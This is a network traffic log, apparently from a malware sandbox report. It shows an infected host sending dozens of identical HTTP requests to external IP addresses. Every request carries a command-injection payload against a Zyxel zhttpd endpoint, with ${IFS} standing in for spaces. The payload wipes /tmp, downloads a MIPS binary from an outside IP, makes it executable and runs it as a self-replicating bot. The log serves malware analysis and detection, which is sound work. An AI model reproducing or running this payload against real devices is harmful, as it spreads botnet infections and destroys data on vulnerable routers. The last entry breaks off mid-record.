                              Session IDSource IPSource PortDestination IPDestination Port
                              625192.168.2.135894863.58.236.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487246037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              626192.168.2.1337854123.34.5.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487279892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              627192.168.2.1354450221.200.68.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487338066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              628192.168.2.1349674209.97.126.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487359047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              629192.168.2.1337984150.15.205.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487416029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              630192.168.2.1339394120.202.174.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487446070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              631192.168.2.1337608105.192.99.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487492085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              632192.168.2.1334440142.245.236.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487534046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              633192.168.2.134803897.89.252.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487581968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              634192.168.2.1340558218.49.21.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487610102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              635192.168.2.13393641.234.58.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487651110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              636192.168.2.134092246.114.3.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487684965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              637192.168.2.1348790196.72.216.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487740993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              638192.168.2.1343404153.8.6.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487786055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              639192.168.2.134610257.244.198.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487818956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              640192.168.2.133625065.234.192.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487870932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              641192.168.2.134162689.2.6.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487899065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              642192.168.2.1349434193.169.131.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487934113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              643192.168.2.133668493.195.164.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487981081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              644192.168.2.133749699.141.61.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488017082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              645192.168.2.1339548200.31.178.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488070965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              646192.168.2.135380885.92.9.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488125086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              647192.168.2.1354256191.219.25.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488162994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              648192.168.2.134707234.122.137.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488188028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              649192.168.2.133925850.14.101.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488231897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              650192.168.2.135408658.123.216.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488296986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              651192.168.2.135287689.139.84.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488332033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              652192.168.2.133835685.75.127.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488400936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              653192.168.2.1332898119.66.230.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488418102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              654192.168.2.1346136119.18.214.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488447905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              655192.168.2.133741635.244.55.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488478899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              656192.168.2.1337684104.79.94.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488533974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              657192.168.2.133505017.255.250.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488579035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              658192.168.2.1338988153.254.168.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488616943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              659192.168.2.1357526204.49.23.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488662004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              660192.168.2.135430044.19.154.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488691092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              661192.168.2.1349784212.2.240.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488734007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              662192.168.2.1342760157.191.229.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488763094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              663192.168.2.133703478.40.221.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488795042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              664192.168.2.1353104114.75.76.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488833904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              665192.168.2.1358144180.42.91.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488877058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              666192.168.2.133592019.252.140.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488919020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              667192.168.2.134024880.142.60.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488954067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              668192.168.2.135415047.154.141.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.488991022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              669192.168.2.134608241.146.108.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489025116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              670192.168.2.134857668.45.229.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489075899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              671192.168.2.1340536139.212.25.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489115000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              672192.168.2.1345146186.101.53.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489160061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              673192.168.2.1346118161.8.24.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489177942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              674192.168.2.1341418173.53.141.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489207983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              675192.168.2.1336198108.55.242.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489250898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              676192.168.2.135900094.117.194.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489262104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              677192.168.2.136028420.167.192.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489315033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              678192.168.2.1337814143.136.121.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489341021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              679192.168.2.1358380222.82.193.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489372969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              680192.168.2.1356830162.52.119.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489414930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              681192.168.2.1355104106.214.228.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489490032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              682192.168.2.1354762133.73.220.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489506960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              683192.168.2.1342336177.249.33.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489557981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              684192.168.2.134604064.28.95.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489598989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              685192.168.2.1350974190.182.53.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489666939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              686192.168.2.1358880218.66.240.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489701033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              687192.168.2.1335654199.240.19.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.489728928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              688192.168.2.134530245.159.103.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493474007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              689192.168.2.1346976186.75.184.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493515015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              690192.168.2.133812276.32.182.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493526936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              691192.168.2.1352950168.155.16.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493606091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              692192.168.2.1333736123.130.108.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493634939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              693192.168.2.135977859.161.48.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493691921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              694192.168.2.1345894151.241.20.82443
                              TimestampBytes transferredDirectionData
